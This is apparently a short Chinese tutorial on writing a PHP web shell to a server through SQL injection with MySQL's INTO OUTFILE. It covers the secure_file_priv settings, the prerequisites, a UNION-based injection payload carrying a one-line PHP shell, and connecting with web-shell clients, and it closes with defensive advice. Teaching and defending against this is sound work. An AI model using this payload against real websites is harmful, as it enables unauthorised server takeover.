1、漏洞介绍
into outfile 语句用于把表数据导出到一个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。
当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出;
当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下;
当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制。
2、必备条件
1)要有secure_file_priv权限
2)知道网站绝对路径(可以通过报错信息、phpinfo界面、404界面等一些方式知道)
3)要能用union
4)对web目录有写权限
5)select <?php @($_POST['xx']);?> into outfile "绝对路径/文件名"
3、实验步骤
1)?id=xx union select 1,2,"<?php @($_POST['xx']);?> into outfile "文件路径"--+
2)蚁剑、哥斯拉连接即可
4、防御
1)数据库连接账号不要用root权限
解释:黑客获取root权限可以对服务器进行操作,最高权限造成了拥有所有可以操作的权限,对任意终端操作。
2)php关闭报错模式
解释:关闭报错模式无法获取数据库配置文件路径,没有路径就会降低攻击,只能另寻他法。
3)mysql账户没有权限向网站目录写文件
解释:限制文件写入的目录和文件类型,避免恶意用户写入危险的文件
2880
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
